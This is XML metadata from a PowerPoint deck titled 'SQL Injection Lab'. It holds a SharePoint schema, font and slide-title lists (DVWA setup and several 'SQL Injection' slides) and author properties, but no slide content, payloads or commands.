<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Cybersecurity Template_4x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C5BAD48BCC5C4AA414F1510DEA3D7D" ma:contentTypeVersion="17" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="90b5e7ce75ae26ded2b46ed2ed259832">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="78fbef2b-ea79-41a1-9651-c56e3f5414e7" xmlns:ns3="1cfa8f96-892a-4f27-bb0a-8631ca5745ca" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="24e7284565e2d835729ba0ed21ccb0df" ns2:_="" ns3:_="">
    <xsd:import namespace="78fbef2b-ea79-41a1-9651-c56e3f5414e7"/>
    <xsd:import namespace="1cfa8f96-892a-4f27-bb0a-8631ca5745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fbef2b-ea79-41a1-9651-c56e3f5414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63f19c8-c610-41ec-b38a-a5f3effcbb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fa8f96-892a-4f27-bb0a-8631ca5745c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91a2a6f-4b9f-444f-bf9c-7445e7e2d830}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="1cfa8f96-892a-4f27-bb0a-8631ca5745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cfa8f96-892a-4f27-bb0a-8631ca5745ca" xsi:nil="true"/>
    <lcf76f155ced4ddcb4097134ff3c332f xmlns="78fbef2b-ea79-41a1-9651-c56e3f5414e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28A30FA-C467-44DF-A09C-26259D1C9D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fbef2b-ea79-41a1-9651-c56e3f5414e7"/>
    <ds:schemaRef ds:uri="1cfa8f96-892a-4f27-bb0a-8631ca5745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849157-078E-413F-AB54-D93E837516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508B1-3A76-46A4-ADC3-01A77E02B494}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="1cfa8f96-892a-4f27-bb0a-8631ca5745ca"/>
    <ds:schemaRef ds:uri="78fbef2b-ea79-41a1-9651-c56e3f5414e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1044</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>119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Courier</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Cybersecurity Template_4x3</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SQL Injection Lab</vt:lpstr>
      <vt:lpstr>Objectives Covered</vt:lpstr>
      <vt:lpstr>What is an SQL Injection Attack?</vt:lpstr>
      <vt:lpstr>The SQL Injection Lab</vt:lpstr>
      <vt:lpstr>Setup Environments</vt:lpstr>
      <vt:lpstr>Find the IP Address (Kali Machine)</vt:lpstr>
      <vt:lpstr>Log into DVWA</vt:lpstr>
      <vt:lpstr>Lower DVWA’s Security</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection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dc:creator>Hermes H. Abrantes</dc:creator>
  <cp:lastModifiedBy>Hermes H. Abrantes</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-10T13:14:14Z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0x010100BCC5BAD48BCC5C4AA414F1510DEA3D7D</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Order">
    <vt:r8>3485200</vt:r8>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>